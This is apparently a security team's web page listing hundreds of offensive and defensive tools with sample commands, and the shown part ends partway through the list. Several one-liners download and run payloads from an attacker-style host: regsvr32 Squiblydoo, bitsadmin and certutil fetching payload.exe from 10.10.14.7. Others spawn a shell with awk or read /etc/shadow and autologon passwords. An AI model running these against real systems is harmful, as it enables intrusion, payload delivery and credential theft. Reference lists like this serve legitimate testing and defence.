[THUGS(red)]

Tools

Everything the team reaches for — CTF, red team, blue team, OSINT, forensics, wireless and living-off-the-land, plus the one-liners we retype every engagement. Search, filter by tag, and click any code block to copy it.

1054
entries
37
tags in use
1h ago
last added
tools.db 1054 shown

AADInternals tool

Blue Team Cloud Enumeration

Nestori Syynimaa's PowerShell toolkit for administering, auditing and (ab)using Azure AD/Entra ID and Office 365 — used defensively to check tenant configuration and hybrid-identity exposure.

visit → added by THUGS(red)

AbuseIPDB tool

Blue Team Research

Community-reported IP abuse database — checks whether an address has been reported for brute-forcing, spam or scanning, with a confidence score and report history.

visit → added by THUGS(red)

AdaptixC2 tool

Offensive Payloads Red Team

Newer open-source, extensible C2 framework with a Java teamserver/GUI client and BOF support, positioned as a free adversary-simulation platform.

visit → added by THUGS(red)

ADCSPwn tool Windows

MITM Offensive Red Team

Coerces a target to authenticate back over HTTP, relays the credentials to the AD CS web enrolment endpoint, and returns a usable certificate — an all-in-one PetitPotam-to-ADCS chain.

ADCSPwn.exe --domain corp.local --port 8080
visit → added by THUGS(red)

ADRecon tool

Enumeration Red Team

Gathers a broad snapshot of an Active Directory environment (users, computers, GPOs, ACLs, trusts, password policy) into an Excel-formatted report for offline review.

./ADRecon.ps1 -Method LDAP -DomainController 10.10.10.5 -Credential corp\user
visit → added by THUGS(red)

AFL++ tool Linux

Binary / RE Fuzzing

The actively maintained, heavily extended fork of American Fuzzy Lop — coverage-guided mutational fuzzing for finding crashes in binaries and libraries.

afl-fuzz -i in -o out -- ./target @@
visit → added by THUGS(red)

Ahmia tool

OSINT Research

Search engine for Tor hidden services that filters out abuse content, one of the few indexing engines that actually crawls .onion sites in a structured way.

visit → added by THUGS(red)

aircrack-ng tool Linux

Brute Force Red Team Wireless / WiFi

The classic WiFi security auditing suite — packet capture, deauthentication and injection, and WEP/WPA-PSK key cracking, in one tightly integrated toolset.

airmon-ng start wlan0\nairodump-ng wlan0mon\naircrack-ng -w rockyou.txt capture.cap
visit → added by THUGS(red)

Airgeddon tool Linux

Red Team Wireless / WiFi

Menu-driven bash wrapper that ties together aircrack-ng, hcxtools, hostapd and other utilities into one guided Wi-Fi auditing workflow (handshake capture, WPS, evil twin, DoS).

sudo bash airgeddon.sh
visit → added by THUGS(red)

Airspy Host Tools tool Linux

Hardware SDR / RF

Official command-line driver/utilities (airspy_rx and friends) for Airspy-brand SDR receivers, used for raw IQ capture independent of a GUI front end.

airspy_rx -f 100.0 -a 10000000 -r output.raw
visit → added by THUGS(red)

ALEAPP tool

Blue Team Forensics Mobile

The Android counterpart to iLEAPP — parses an Android filesystem or physical extraction into categorised, human-readable reports covering messaging, browser, app and system artifacts.

python3 aleapp.py -t fs -i extraction/ -o report/
visit → added by THUGS(red)

AlienVault OTX tool

Blue Team Research

Open Threat Exchange — a free, community-driven threat-intelligence sharing platform with searchable "pulses" of IOCs contributed by security researchers.

visit → added by THUGS(red)

altdns tool

DNS Recon Wordlists

Generates subdomain permutations and alterations from a wordlist of common patterns (dev, staging, api-v2) and resolves the results.

altdns -i subdomains.txt -o data_output -w words.txt -r -s results.txt
visit → added by THUGS(red)

Amass tool

DNS Enumeration OSINT Recon

OWASP in-depth attack-surface mapping tool: DNS enumeration, subdomain discovery via dozens of passive sources, and network-mapping graph output.

amass enum -passive -d example.com -o subdomains.txt
visit → added by THUGS(red)

AmcacheParser tool Windows

Blue Team Forensics

Eric Zimmerman's parser for Amcache.hve — a registry hive tracking executed and installed applications, including SHA1 hashes and first-execution timestamps.

AmcacheParser.exe -f Amcache.hve --csv out
visit → added by THUGS(red)

Amnesty International YouTube DataViewer tool

Forensics OSINT

Extracts every thumbnail and the exact upload timestamp from a YouTube video, used to verify when a video was actually first published.

visit → added by THUGS(red)

analyzeMFT tool

Blue Team Forensics

Cross-platform Python NTFS $MFT parser — a free, scriptable alternative to MFTECmd for extracting file record metadata from a raw MFT extract.

analyzeMFT.py -f \$MFT -o mft.csv
visit → added by THUGS(red)

AndroGuard tool

Binary / RE Mobile Research

Python library and CLI for reverse-engineering Android apps programmatically — parses DEX/APK structure, builds call graphs and diffs for scripted analysis rather than manual GUI review.

androguard analyze app.apk
visit → added by THUGS(red)

angr tool

Binary / RE CTF Research

Python binary analysis platform combining symbolic execution, CFG recovery and taint tracking — the go-to for scripting a solve against a stripped pwn or reversing binary.

python3 -c "import angr; p = angr.Project('./chall'); print(p.factory.entry_state())"
visit → added by THUGS(red)

Angry IP Scanner tool

Enumeration Network

Simple, fast cross-platform IP address and port scanner with a GUI — a quick way to inventory what is alive on a subnet without learning nmap syntax.

visit → added by THUGS(red)

ANY.RUN tool

Blue Team Malware

An interactive online malware sandbox — unlike a fully automated sandbox, an analyst can click through the running VM in real time (dismiss a dialog, wait out a sleep timer) to get past evasion that defeats hands-off detonation.

visit → added by THUGS(red)

APKiD tool

Binary / RE Malware Mobile

Fingerprints an APK's toolchain, compiler and packer/obfuscator (PEiD for Android) — quickly flags whether a sample was built with a known obfuscation or packing tool.

apkid app.apk
visit → added by THUGS(red)

Apktool tool

Binary / RE Mobile

Decodes Android APK resources back to a near-original form and rebuilds them after edits — the standard first step in Android reverse engineering and repackaging.

apktool d app.apk
visit → added by THUGS(red)

AppCompatCacheParser tool Windows

Blue Team Forensics

Eric Zimmerman's parser for the Shimcache (AppCompatCache) registry value — a list of executables the OS has seen, one more source of program-execution evidence.

AppCompatCacheParser.exe -f SYSTEM --csv out
visit → added by THUGS(red)

AppLocker bypass with regsvr32 (Squiblydoo) one-liner Windows

LOLBAS / LOTL Red Team

regsvr32 loads a scriptlet straight from a remote URL, sidestepping AppLocker rules that only block .exe execution.

regsvr32 /s /n /u /i:http://10.10.14.7/payload.sct scrobj.dll
visit → added by THUGS(red)

Aquatone tool

Recon Red Team Web

A tool for visual inspection of websites across a large list of hosts, producing an HTML report of screenshots grouped by similarity — an older but still-used alternative to gowitness/EyeWitness.

cat hosts.txt | aquatone
visit → added by THUGS(red)

archive.today tool

OSINT Recon

On-demand webpage archiving service that snapshots a page instantly, useful for preserving content that blocks the Wayback Machine's crawler or that changes quickly.

visit → added by THUGS(red)

Argus tool Linux

Blue Team Network

The Audit Record Generation and Utilization System — a network flow monitor that turns raw traffic into detailed, auditable flow records, one of the longest-running open network-audit projects still maintained.

argus -i eth0 -w flows.argus
visit → added by THUGS(red)

Arjun tool

Fuzzing Red Team Web

Finds hidden HTTP GET/POST parameters on a web endpoint by bruteforcing against a large parameter-name wordlist — the step before you know what to actually inject into.

arjun -u https://target.tld/api/endpoint
visit → added by THUGS(red)

Arkime tool Linux

Blue Team Defensive Network

Full-packet-capture indexing and search system (formerly Moloch) — captures and stores traffic at scale, then lets analysts search and pull sessions back out by any field, PCAP included.

visit → added by THUGS(red)

Arkime (formerly Moloch) tool Linux

Blue Team Forensics Network

Large-scale, indexed full-packet capture — captures and stores traffic while indexing session metadata for search, so a SOC can pull the exact PCAP for an alert from months of retained traffic instead of scrolling Wireshark.

visit → added by THUGS(red)

arp-scan tool Linux

Enumeration Network

Layer-2 ARP-based host discovery for the local network segment — finds every device on the LAN, including ones that would not respond to an ICMP or TCP scan.

sudo arp-scan --localnet
visit → added by THUGS(red)

Arsenal Image Mounter tool Windows

Blue Team Forensics

Mounts forensic disk images (E01, dd, VHD and more) as native Windows disks, read-only and write-cached, so any Windows tool can browse or run analysis against them without a physical write-blocker.

visit → added by THUGS(red)

arXiv cs.CR tool

Cryptography Research

Preprint archive listing for the cryptography-and-security category, where much academic security research appears months before formal conference publication.

visit → added by THUGS(red)

ASN and network lookup via Team Cymru whois one-liner

DNS Network Recon

Team Cymru's whois service answers an IP's ASN, prefix, country and registry in a single query, with no API key required.

whois -h whois.cymru.com " -v 1.1.1.1"
visit → added by THUGS(red)

assetfinder tool

DNS Enumeration OSINT Recon

Small Go tool that finds domains and subdomains related to a given domain from a handful of free sources — a lightweight complement to heavier enumerators.

assetfinder --subs-only example.com
visit → added by THUGS(red)

Atomic Red Team tool

Blue Team Defensive Red Team

Red Canary's library of small, individually-executable tests mapped one-to-one to ATT&CK techniques — run a single atomic test and check whether the expected alert fired, instead of a full adversary-emulation exercise.

Invoke-AtomicTest T1003.001
visit → added by THUGS(red)

Autopsy tool

Blue Team Forensics

The graphical front-end to The Sleuth Kit — a complete open-source digital forensics platform for disk images: timeline analysis, keyword search, file recovery and more.

visit → added by THUGS(red)

Autorize tool

Red Team Web

A Burp Suite extension that automatically tests every request with a lower-privileged session, surfacing broken access-control (authorisation) bugs without manually replaying each one.

visit → added by THUGS(red)

Autoruns tool Windows

Blue Team Defensive Forensics

Sysinternals tool enumerating every autostart location on Windows (run keys, services, scheduled tasks, WMI, browser helper objects…) — the fastest way to spot a persistence mechanism.

autorunsc.exe -accepteula -a * -c -h -s > autoruns.csv
visit → added by THUGS(red)

AVML tool Linux

Blue Team Forensics

Microsoft's Acquire Volatile Memory for Linux — a self-contained, dependency-free memory acquisition tool designed to work across kernels without a matching LiME module.

./avml output.lime
visit → added by THUGS(red)

awk — spawn a shell from an unexpected binary one-liner Linux

CTF LOLBAS / LOTL Red Team

awk's system() function runs an arbitrary command — another common SUID-binary shell-breakout primitive from GTFOBins.

awk 'BEGIN {system("/bin/sh")}'
visit → added by THUGS(red)

Background download with bitsadmin one-liner Windows

LOLBAS / LOTL Network Red Team

The BITS job service moves a file over HTTP in the background, a built-in transfer path separate from PowerShell logging.

bitsadmin /transfer job /download /priority high http://10.10.14.7/payload.exe C:\Windows\Temp\payload.exe
visit → added by THUGS(red)

BadBlood tool Windows

CTF Red Team

Populates a lab Active Directory with thousands of realistic-looking users, groups and misconfigurations, so BloodHound/PingCastle tooling has something non-trivial to chew on.

.\Invoke-BadBlood.ps1
visit → added by THUGS(red)

Baseline running Linux services against systemd units one-liner Linux

Blue Team Defensive Forensics

Diffing enabled units against a known-good baseline is a fast way to spot a persistence unit an attacker added, without waiting for full artifact collection.

systemctl list-unit-files --state=enabled | sort > current_units.txt
diff baseline_units.txt current_units.txt
added by THUGS(red)

Bash one-liner: reverse-resolve a whole subnet fast one-liner Linux

DNS Network Recon

A quick parallel PTR sweep across a /24 without needing a dedicated scanner installed.

for i in $(seq 1 254); do host 10.10.10.$i & done 2>/dev/null | grep -v 'not found'
added by THUGS(red)

Belkasoft RAM Capturer tool Windows

Blue Team Forensics

Free lightweight Windows memory acquisition tool from Belkasoft — designed to run cleanly even against systems with anti-debugging/anti-dumping protections.

visit → added by THUGS(red)

Bellingcat's Online Investigation Toolkit tool

Cheat Sheets OSINT Research

Bellingcat's public, community-maintained spreadsheet of OSINT tools and resources spanning geolocation, archives, social media and satellite imagery, used in their open-source investigations.

visit → added by THUGS(red)

Bettercap tool Linux

MITM Network Red Team Wireless / WiFi

A Swiss-army-knife framework for network attacks and monitoring — MITM, WiFi/BLE reconnaissance and attacks, and a scriptable, extensible core.

sudo bettercap -iface eth0
visit → added by THUGS(red)

BGPView tool

Network Recon

Free API and website for ASN, prefix and peering data, a lighter alternative to the Hurricane Electric toolkit for scripted lookups.

curl -s https://api.bgpview.io/ip/1.1.1.1
visit → added by THUGS(red)

Binary Ninja tool

Binary / RE CTF

Commercial disassembler and decompiler (with a free Cloud/Personal tier) built around a scriptable intermediate-language stack (LLIL/MLIL/HLIL) that is friendlier to automate than most.

visit → added by THUGS(red)

Binary Refinery tool

Blue Team Malware

CLI toolkit of chainable "units" (like a Unix pipeline) for deobfuscating and unpacking malware — base64/XOR decode, carve, decompress and extract config data in one piped command.

emit sample.bin | carve -f b64 | b64 | xor 0x41 | peek
visit → added by THUGS(red)

BinaryEdge tool

Device Search OSINT Search Engines

An internet-wide scanning platform and search engine similar in purpose to Shodan/Censys — exposed services, vulnerabilities and threat intelligence indexed from continuous global scans.

visit → added by THUGS(red)

BinDiff tool

Binary / RE CTF

Binary diffing tool (originally Zynamics, now Google) that matches functions between two versions of a binary — invaluable for spotting exactly what a patched-vs-unpatched CTF binary changed.

visit → added by THUGS(red)

binvis.io tool

Binary / RE CTF Steganography

Visualizes a binary file as a space-filling curve image, making repeated structure, embedded files, and anomalies visually obvious — useful both for RE triage and for spotting a likely stego carrier.

visit → added by THUGS(red)

binwalk tool

Binary / RE Forensics Hardware

Identifies and extracts embedded files and firmware images buried inside a binary blob — signature-scans for known file/filesystem headers and carves out what it finds.

binwalk -e firmware.bin
visit → added by THUGS(red)

bitsadmin — background-transfer a file past egress filtering one-liner Windows

LOLBAS / LOTL Red Team

The Background Intelligent Transfer Service is designed for Windows Update traffic and often has a quieter egress path than a browser or PowerShell's own web client.

bitsadmin /transfer job /download /priority high http://10.10.14.7:8000/file.exe C:\Windows\Temp\file.exe
visit → added by THUGS(red)

bkcrack tool

Cryptography CTF Hashing

Recovers the internal keys of legacy ZipCrypto encryption via a known-plaintext attack — give it a few known bytes from any file in the archive and it derives the keys to decrypt the rest.

bkcrack -C secret.zip -c cipher.bin -p plain.bin
visit → added by THUGS(red)

Bleah tool Linux

Enumeration Wireless / WiFi

Lightweight BLE scanner for quickly enumerating nearby devices and their advertised services/characteristics from the command line, without a full GATT client.

bleah -t 5 -v
visit → added by THUGS(red)

Bless tool Linux

Binary / RE

GTK hex editor for Linux with a plugin architecture and support for very large files — a lightweight option when a full RE hex-editor is overkill.

visit → added by THUGS(red)

BloodHound tool

Enumeration Offensive Red Team

Maps Active Directory (and Azure AD) trust relationships as a graph, using graph theory to reveal attack paths to Domain Admin that are invisible in a flat user/group listing.

bloodhound-python -u user -p pass -d domain.local -ns 10.10.10.10 -c All
visit → added by THUGS(red)

BloodHound.py tool Linux

Enumeration Offensive Red Team

Python re-implementation of the SharpHound collector for Linux-based operators, gathering the same AD graph data without needing a Windows box.

bloodhound-python -u user -p pass -ns 10.10.10.5 -d corp.local -c all
visit → added by THUGS(red)

Blue Hydra tool Linux

Defensive Enumeration Wireless / WiFi

Bluetooth (Classic + BLE) device discovery service that logs and fingerprints everything it sees over time, aimed at long-running physical-security/asset-tracking style monitoring.

sudo blue_hydra
visit → added by THUGS(red)

bluetoothctl (BlueZ) tool Linux

Enumeration Wireless / WiFi

The interactive control shell shipped with Linux's BlueZ stack — scanning, pairing and GATT inspection without installing anything extra, and the first thing to reach for before pulling out dedicated BLE tooling.

bluetoothctl
[bluetooth]# scan on
[bluetooth]# devices
[bluetooth]# gatt.list-attributes <MAC>
visit → added by THUGS(red)

Bluing tool Linux

Enumeration Recon Wireless / WiFi

Bluetooth reconnaissance framework covering Classic, LE and (some) mesh/Zigbee-adjacent radios in one CLI, aimed at building a fuller picture than a single-mode scanner.

bluing le scan
visit → added by THUGS(red)

boofuzz tool

Binary / RE Fuzzing Network

Protocol-aware fuzzing framework (fork/successor of Sulley) for building fuzzers against network services and file formats with defined message structures.

visit → added by THUGS(red)

Bopscrk tool

Brute Force Wordlists

Interactive wordlist generator that builds candidate passwords from personal-info keywords plus configurable leet/case/special-character mutations, similar in spirit to CUPP with more mangling options.

bopscrk -w words.txt
visit → added by THUGS(red)

Boxentriq Cipher Identifier tool

Ciphers CTF

Heuristic identifier that suggests which classical cipher or encoding a piece of ciphertext most likely came from, based on its character set and statistical shape.

visit → added by THUGS(red)

BreachDirectory tool

OSINT Search Engines

Free breach-data search engine with hash-based password lookups alongside email and username exposure checks.

visit → added by THUGS(red)

Brim / Zui tool

Blue Team Forensics Network

Desktop app for searching and analysing large pcap/Zeek log sets with the Zed query language — much faster iteration than opening a huge capture in a GUI packet viewer.

visit → added by THUGS(red)

Brute Ratel C4 tool Windows

Offensive Payloads Red Team

Commercial adversary-simulation C2 built specifically around EDR/AV evasion (badger implants, custom syscall stubs); frequently referenced alongside Cobalt Strike in red team tradecraft discussions.

visit → added by THUGS(red)

Brute-force an unknown UART baud rate one-liner Linux

Brute Force Hardware

When a UART header is identified but the baud rate is not, quickly cycle through the common rates and watch for readable boot text instead of guessing one at a time.

for baud in 9600 19200 38400 57600 115200; do
  echo "--- trying $baud ---"
  timeout 3 picocom -b $baud -q /dev/ttyUSB0
done
added by THUGS(red)

BruteSpray tool Linux

Brute Force

Takes an Nmap/Masscan GNMAP/XML output and automatically brute-forces every service it recognises using Medusa under the hood — no manual target/service mapping needed.

brutespray --file scan.gnmap -u users.txt -p rockyou.txt
visit → added by THUGS(red)

Btlejack tool Linux

Hardware Offensive Wireless / WiFi

BLE sniffing and hijacking toolkit (needs a couple of cheap nRF51-based dongles) that can follow, jam and even take over an existing BLE connection.

btlejack -s
visit → added by THUGS(red)

bucket_finder tool

Brute Force Cloud Recon

One of the original S3-bucket-name brute-forcing tools — checks a wordlist of candidate names for existence and public read access.

ruby bucket_finder.rb wordlist.txt
visit → added by THUGS(red)

BuiltWith tool

OSINT Recon Web

Web technology profiler — identifies the CMS, analytics, ad networks, frameworks and hosting stack behind a site, plus historical technology-adoption lookups.

visit → added by THUGS(red)

bulk_extractor tool

Blue Team Forensics

Scans a disk image, memory dump or arbitrary blob for recognisable features (email addresses, credit-card numbers, URLs, EXIF data) using carving and regex, ignoring filesystem structure entirely — useful when the filesystem is damaged or unknown.

bulk_extractor -o output/ disk.dd
visit → added by THUGS(red)

Bulk-resolve a subdomain wordlist with massdns one-liner Linux

Brute Force DNS Recon

Resolves a large subdomain candidate list against a set of trusted public resolvers far faster than looping dig/host over each name.

massdns -r resolvers.txt -t A -o S -w results.txt subdomains.txt
visit → added by THUGS(red)

Bully tool Linux

Brute Force Wireless / WiFi

C reimplementation of the WPS brute-force PIN attack (an alternative to Reaver with different timing/retry behaviour against flaky APs).

bully -b AA:BB:CC:DD:EE:FF wlan0mon
visit → added by THUGS(red)

Burp Suite tool

Blackbox Red Team Web Whitebox

The standard web application security testing platform — intercepting proxy, repeater, intruder and a huge extension ecosystem (BApp Store). Community edition is free; Pro adds the active scanner.

visit → added by THUGS(red)

Bus Pirate tool

Hardware

Open-source USB hardware swiss-army-knife for talking to unknown chips over UART/SPI/I2C/JTAG/1-Wire from a serial terminal — usually the first thing plugged into an unidentified header on a PCB.

picocom /dev/ttyUSB0 -b 115200
visit → added by THUGS(red)

buster tool

OSINT Recon

Email OSINT tool that checks an address against breach data, social-media registration and domain information in one pass.

buster -e [email protected] -b
visit → added by THUGS(red)

Bytecode Viewer tool

Binary / RE CTF Mobile

All-in-one Java/Android reverse engineering GUI bundling several decompilers (Procyon, CFR, FernFlower) side by side plus a bytecode editor and debugger.

visit → added by THUGS(red)

CachedView tool

OSINT Recon

Quick lookup tool for a page's Google cache and Wayback Machine snapshot from one search box, useful when a page has just gone offline or been edited.

visit → added by THUGS(red)

CACTUSTORCH tool Windows

Payloads Red Team

Generates JS/VBS/HTA payloads that use DotNetToJScript to load a .NET assembly and shellcode directly into memory from a script host.

visit → added by THUGS(red)

CADO-NFS tool Linux

Cryptography CTF Research

Complete number field sieve implementation for factoring very large RSA moduli — the tool of last resort once yafu/msieve are too slow for the key size involved.

visit → added by THUGS(red)

CAIDA tool

Network Research

Center for Applied Internet Data Analysis — hosts long-running academic datasets on internet topology, routing and traffic used in network-security research.

visit → added by THUGS(red)

Canarytokens tool

Blue Team Defensive

Thinkst's free trip-wire generator — produces tokens (a fake AWS key, a Word doc, a URL, a DNS name) that silently phone home the moment someone opens or uses them, turning "did anyone touch this?" into an instant alert.

visit → added by THUGS(red)

capa tool

Binary / RE Blue Team Malware

Identifies capabilities in an executable — "reads the clipboard", "installs a service", "encrypts files" — by matching disassembly and API-call patterns, so an analyst gets a functional summary before doing manual reverse engineering.

capa malware.exe
visit → added by THUGS(red)

CAPE Sandbox tool Linux

Blue Team Defensive Malware

An automated malware analysis sandbox descended from Cuckoo, focused on Configuration And Payload Extraction — it unpacks and extracts C2 configs from common malware families rather than just logging behaviour.

visit → added by THUGS(red)

CAPEv2 tool Linux

Blue Team Malware

Config And Payload Extraction — a Cuckoo fork focused on automatically unpacking malware and dumping the decrypted C2 configuration of hundreds of known families.

visit → added by THUGS(red)

Capstone tool

Binary / RE CTF

Multi-architecture disassembly engine and library (with Python/C/Rust/… bindings) that many other RE tools — including Frida and Qiling — embed rather than write their own.

python3 -c "import capstone"
visit → added by THUGS(red)

CapTipper tool

Blue Team Malware Network

Explores malicious HTTP traffic captured in a pcap — replays the conversation, reconstructs redirect chains and lets you pull out the delivered payload for analysis.

python captipper.py malicious.pcap
visit → added by THUGS(red)

Carrot2 tool

Research Search Engines

Search-results clustering engine that groups a large result set into labelled topic clusters, useful for making sense of a broad OSINT search dump.

visit → added by THUGS(red)

Cartography tool

Blue Team Cloud Recon

Lyft-originated tool that consolidates infrastructure and cloud asset relationships (AWS, GCP, GitHub, Okta, etc.) into a Neo4j graph for attack-surface and blast-radius analysis.

cartography --neo4j-uri bolt://localhost:7687
visit → added by THUGS(red)

CDIR Collector tool Windows

Blue Team Forensics

Cyber Defense Institute's free Windows artifact collector — grabs registry hives, event logs, prefetch, browser history and more into one archive for offline analysis.

visit → added by THUGS(red)

Cellebrite tool

Blue Team Forensics Mobile

Commercial mobile device forensics platform (UFED and related products) — the industry-standard hardware/software for extracting and decoding data from seized mobile devices.

visit → added by THUGS(red)

Censys tool

Device Search OSINT Recon Search Engines

An internet-wide device and certificate search engine built from continuous internet scanning — heavily used for attack-surface discovery and certificate-based host enumeration.

visit → added by THUGS(red)

Certify tool Windows

Offensive Red Team

GhostPack tool for enumerating and abusing misconfigured Active Directory Certificate Services (AD CS) templates to obtain certificates for privilege escalation.

Certify.exe find /vulnerable
visit → added by THUGS(red)

Certipy tool

Enumeration Offensive Red Team

Enumerates and abuses Active Directory Certificate Services (AD CS) misconfigurations — the ESC1-ESC8 escalation paths that let a low-privileged user mint a Domain Admin certificate.

certipy find -u [email protected] -p pass -dc-ip 10.10.10.10 -vulnerable
visit → added by THUGS(red)

certutil — decode a base64 blob with a built-in binary one-liner Windows

CTF LOLBAS / LOTL Red Team

certutil's -decode flag doubles as a base64 decoder, useful when nothing else on the box will do it for you.

certutil -decode encoded.b64 decoded.bin
visit → added by THUGS(red)

certutil — download a file with a signed Windows binary one-liner Windows

CTF LOLBAS / LOTL Red Team

certutil is signed, present on every Windows box by default, and nobody expects it to make HTTP requests — a classic LOLBAS download primitive.

certutil.exe -urlcache -split -f http://10.10.14.7:8000/file.exe file.exe
visit → added by THUGS(red)

CeWL tool

Red Team Web Wordlists

Spiders a website and builds a custom wordlist from the words it finds — useful for generating a target-specific password/username dictionary rather than relying on rockyou alone.

cewl https://target.tld -d 2 -m 5 -w wordlist.txt
visit → added by THUGS(red)

CFF Explorer tool Windows

Binary / RE

PE file viewer/editor (part of the Explorer Suite) for inspecting and hand-modifying PE headers, sections, imports and resources.

visit → added by THUGS(red)

CFF Explorer (Explorer Suite) tool Windows

Binary / RE Blue Team Malware

PE editor and viewer for manually inspecting and patching Windows executable headers, sections, imports and resources — a staple of PE-format malware triage.

visit → added by THUGS(red)

CFR tool

Binary / RE CTF

Actively maintained Java decompiler that copes well with modern bytecode and mildly obfuscated class files.

java -jar cfr.jar ./Challenge.class --outputdir out
visit → added by THUGS(red)

Chainsaw tool

Blue Team Enumeration Forensics

Fast command-line triage of Windows Event Logs — runs Sigma rules and built-in detection logic across EVTX files to surface logons, lateral movement and other indicators without loading them into a SIEM first.

chainsaw hunt evtx_dir/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml
visit → added by THUGS(red)

ChameleonMini tool

Hardware NFC / RFID

Open-source hardware that emulates and clones RFID/NFC tags (rather than just reading them) — used to test how access-control readers react to a spoofed or replayed credential.

visit → added by THUGS(red)

ChameleonUltra tool

Hardware NFC / RFID

Pocket-sized successor to ChameleonMini with BLE control from a phone app, dual-frequency (LF+HF) emulation, and onboard support for common Mifare attacks.

visit → added by THUGS(red)

changeme tool

Brute Force Enumeration

Scans a network for services still running their vendor-default credentials, using a large built-in database of default logins across routers, cameras, admin panels and more.

changeme 10.10.10.0/24
visit → added by THUGS(red)

chaos (ProjectDiscovery) tool

DNS Enumeration OSINT Recon

Dataset and API of continuously-crawled subdomain data for public bug-bounty-in-scope domains, maintained by ProjectDiscovery and queryable via their CLI.

chaos -d example.com -silent
visit → added by THUGS(red)

Cheat Engine tool Windows

Binary / RE CTF

Memory scanner, debugger and code injector originally built for game hacking — the go-to tool for CTF "game reversing" challenges that ask you to find and patch a value in a running process.

visit → added by THUGS(red)

Check a binary's security mitigations one-liner Linux

Binary / RE CTF Offensive

Reports which exploit-mitigating protections (RELRO, stack canary, NX, PIE, RPATH) a binary was built with, the first thing to run against any new CTF pwn challenge.

checksec --file=./chall
# or from a pwntools script:
python3 -c "from pwn import *; print(ELF('./chall').checksec())"
added by THUGS(red)

Check a hash against Pwned Passwords (k-anonymity) one-liner

Hashing OSINT Wordlists

Queries Have I Been Pwned's Pwned Passwords range API with only a 5-character SHA-1 prefix, so the full password/hash never leaves your machine, and greps the response for the suffix.

hash=$(printf %s 'password123' | sha1sum | tr 'a-z' 'A-Z' | cut -c1-40)
curl -s "https://api.pwnedpasswords.com/range/${hash:0:5}" | grep -i "${hash:5}"
visit → added by THUGS(red)

Check AlwaysInstallElevated one-liner Windows

Enumeration Red Team

When both registry values are set to 1, any user can install an MSI that runs as SYSTEM, a one-command privesc check.

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
added by THUGS(red)

Check AlwaysInstallElevated in one line one-liner Windows

CTF Enumeration Red Team

A one-line check for the classic misconfiguration where any user can run an MSI as SYSTEM — if both registry values come back 1, it is exploitable.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
added by THUGS(red)

Check current sudo rights one-liner Linux

Enumeration Red Team

sudo -l lists exactly what the current account can run as another user, often the fastest path to root on a CTF or pentest box.

sudo -l
added by THUGS(red)

Check current user token group memberships one-liner Windows

Enumeration

whoami /groups reveals integrity level and any high-value group membership picked up through nested group assignment, easy to miss otherwise.

whoami /groups
added by THUGS(red)

Check FileVault encryption status one-liner macOS

Enumeration Forensics

A quick compliance and incident-response check; an unencrypted disk changes what is recoverable from a lost or seized machine.

fdesetup status
added by THUGS(red)

Check for a global LD_PRELOAD backdoor one-liner Linux

Blue Team Forensics Malware

/etc/ld.so.preload is loaded into every dynamically linked binary on the system, a favourite location for rootkit persistence.

cat /etc/ld.so.preload 2>/dev/null
ls -la /etc/ld.so.preload
added by THUGS(red)

Check for autologon credentials in the registry one-liner Windows

Enumeration Red Team

DefaultUserName and DefaultPassword under Winlogon are stored in cleartext whenever autologon is configured, a one-command find.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
added by THUGS(red)

Check for cron jobs running as root one-liner Linux

Enumeration Red Team

A cron job invoking a world-writable script, or one located in a writable directory, is one of the most common realistic Linux privesc paths.

cat /etc/crontab /etc/cron.d/* 2>/dev/null
ls -la /etc/cron.daily /etc/cron.hourly /etc/cron.weekly
added by THUGS(red)

Check for hidden or unusual mounts one-liner Linux

Enumeration Forensics

An unexpected bind mount or overlay filesystem can be a container escape artifact or a hidden persistence location.

mount | column -t
findmnt
added by THUGS(red)

Check for immutable files hiding tampering one-liner Linux

Blue Team Forensics

The immutable attribute is sometimes set on a tampered binary or config to stop even root from silently editing it back.

lsattr -R /etc /bin /usr/bin 2>/dev/null | grep -- '----i'
added by THUGS(red)

Check for NFS no_root_squash exports one-liner Linux

Enumeration Network Red Team

An NFS export with no_root_squash lets a remote root user write files as root on the export, including a SUID binary to escalate through locally.

cat /etc/exports 2>/dev/null | grep -v '^#' | grep no_root_squash
added by THUGS(red)

check for readable /etc/shadow (and similar over-permissioned files) one-liner Linux

Blue Team CTF Enumeration

A one-line sanity check that should always return nothing — if it returns something, that box has a serious permissions bug worth reporting.

ls -la /etc/shadow /etc/gshadow 2>/dev/null
added by THUGS(red)

Check for the polkit pkexec CVE (PwnKit) one-liner Linux

Enumeration Red Team

A quick permission and version check for CVE-2021-4034, a near-universal local root affecting most 2021-and-earlier polkit installs.

ls -l $(which pkexec)
pkexec --version
added by THUGS(red)

Check Gatekeeper verdict on a binary one-liner macOS

Blue Team Forensics

spctl reports exactly why Gatekeeper would allow or block an app, signed, notarized, or neither, before deciding whether to trust it.

spctl -a -vv /Applications/Suspicious.app
added by THUGS(red)

Check if /etc/shadow is readable one-liner Linux

Enumeration Hashing Red Team

A misconfigured permission on /etc/shadow hands over every password hash on the box in a single command.

ls -la /etc/shadow
cat /etc/shadow 2>/dev/null
added by THUGS(red)

Check installed sudo version against known CVEs one-liner Linux

Enumeration Red Team

sudo has had several serious version-specific privesc bugs, including CVE-2019-14287 and CVE-2021-3156; the version string is the first thing to check.

sudo -V | head -n1
added by THUGS(red)

Check kernel version for known exploits one-liner Linux

Enumeration Red Team

The kernel and distro version is the fastest first lookup against a local database of known privesc CVEs before trying anything noisier.

uname -a
cat /etc/os-release
added by THUGS(red)

Check last logins and currently logged-in users one-liner Linux

Blue Team Forensics

A fast first pass on an IR call — who has logged in recently, who is on the box right now, and whether wtmp shows anything that does not line up with what the customer told you.

last -F -x | head -30
w
lastb -F | head -20   # failed logins, if btmp is enabled
added by THUGS(red)

Check legacy StartupItems one-liner macOS

Enumeration Forensics

Deprecated since OS X 10.10 but still executed if present, and still checked by both malware and thorough incident responders.

ls -la /Library/StartupItems /System/Library/StartupItems 2>/dev/null
added by THUGS(red)

Check login and logout hook persistence one-liner macOS

Enumeration Forensics

Login and logout hooks are a deprecated but still-functional per-user persistence mechanism configured under com.apple.loginwindow.

defaults read com.apple.loginwindow LoginHook 2>/dev/null
defaults read com.apple.loginwindow LogoutHook 2>/dev/null
added by THUGS(red)

Check PATH for a writable directory one-liner Linux

